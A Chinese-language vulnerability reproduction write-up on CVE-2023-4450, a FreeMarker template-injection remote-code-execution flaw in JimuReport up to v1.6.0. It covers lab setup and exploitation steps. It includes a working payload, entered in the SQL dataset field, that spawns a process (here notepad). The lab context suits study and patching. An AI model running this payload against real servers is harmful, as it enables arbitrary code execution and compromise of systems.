简介
jeecgboot积木报表系统jimureport(jmreport)是一款免费的数据可视化报表,含报表和大屏设计,像搭建积木一样在线设计报表!功能涵盖数据报表、打印设计、图表报表、大屏设计等!
官网地址:http://jimureport.com/源码地址:https://github.com/jeecgboot/JimuReport开发语言:Java
空间测绘
回复“CVE-2023-4450”获取空间测绘搜索语句漏洞描述
jimureport ≤ v1.6.0 具有 SSTI(服务器端模板注入),攻击者可利用该漏洞远程执行任意代码(RCE)。
影响版本
jimureport ≤ v1.6.0
漏洞环境
环境要求:JDK7+,MySQL
1.漏洞环境下载(V1.5.8版本):
https://pan.baidu.com/s/1NZJeAapDoEHEuwAhyCzUSA?pwd=wl482.将“jimureport.mysql5.7.create.sql”导入数据库
3.修改好配置文件“application.yml”
4.双击“start.bat”运行程序,访问以下链接即可:
http://localhost:8085/jmreport/list漏洞利用
1.访问以下链接,然后点击“新建报表”
http://localhost:8085/jmreport/list2.新建“数据集管理”,然后点击“SQL数据集”
3.填写以下数据并点击“SQL解析”执行代码
<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","notepad").start ()}4.成功弹出记事本
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2023-4450https://github.com/keecth/bug/blob/main/jimureport%20ssti(RCE).mdhttp://jimureport.com/
回复“CVE-2023-4450” 获取空间测绘语句
仅供学习交流,勿用作违法犯罪
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2OTYzNTExNQ==&mid=2247484402&idx=1&sn=bb95de822adcab415085d7554e19f2da&chksm=ce9b46b6f9eccfa017dbdabefd5d70448bf97df96520fcf1437bf26960767dc9a9c4d67c89bd&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh